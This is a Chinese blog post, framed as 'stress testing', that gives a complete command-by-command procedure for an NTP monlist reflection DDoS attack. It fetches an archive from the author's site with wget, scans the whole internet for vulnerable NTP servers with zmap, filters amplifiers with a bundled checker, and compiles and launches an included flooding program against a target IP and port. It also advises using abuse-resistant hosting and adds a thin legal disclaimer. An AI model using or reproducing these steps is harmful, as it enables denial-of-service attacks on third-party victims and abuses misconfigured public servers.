利用大带宽服务器进行压力测试
请使用抗投诉服务器,切勿使用国内服务器,本人不承担任何法律责任!
系统环境为CentOS7 先sudo su 给权限
首先yum update后安装依赖
1 | yum install epel-release -y |
然后下载压缩包
1 | wget blog.myyrh.com/hh/D.zip |
若提示没$wget$
1 | yum install -y wget |
然后默认在/root 下解压
1 | unzip D.zip |
打开一个screen并使用zmap进行扫描
1 | screen zmap -p 123 -M udp --probe-args=file:/root/ntp_123_monlist.pkt -o monlist_fingerprint.txt |
如果提示错误需要指定网卡,加一个-i 网卡名称,例如
1 | screen zmap -i p2p1 -p 123 -M udp --probe-args=file:/root/ntp_123_monlist.pkt -o monlist_fingerprint.txt |
然后就是漫长的等待,测试服务器使用500M带宽,扫描全网花了6个小时
扫出结果后,我们需要检查下列表内的IP哪些可以使用反射
给压缩包内的ntpchecker 777权限
1 | chmod 777 ntpchecker |
进行检查
1 | ./ntpchecker monlist_fingerprint.txt step1.txt 1 0 1 |
这个步骤应该10分钟就OK了,具体取决于机器性能和网络速率,怕掉线的话可以开个screen保持
检查完成后,进行格式化
1 | awk '$2>419{print $1}' step1.txt | sort -n | uniq | sort -R > ntpamp.txt |
这样我们就得到了一份可以用来进行使用的NTP列表了
压缩包内已经有了攻击程序,可以直接使用
编译压缩包内的攻击程序
1 | gcc -lpthread ntp.c -lpcap -o ntp |
到此就可以了
使用命令举例
1 | ./ntp 127.0.0.1 80 ntpamp.txt 1000 -1 100 |
1 | 127.0.0.1=目标IP |
请合理利用,请勿适用于非法用途
- Post title: 利用大带宽服务器进行压力测试
- Create time: 2022-01-23 17:05:33
- Post link: 2022/01/23/BigServerDdos/
- Copyright notice: All articles in this blog are licensed under BY-NC-SA unless stating additionally.
Comments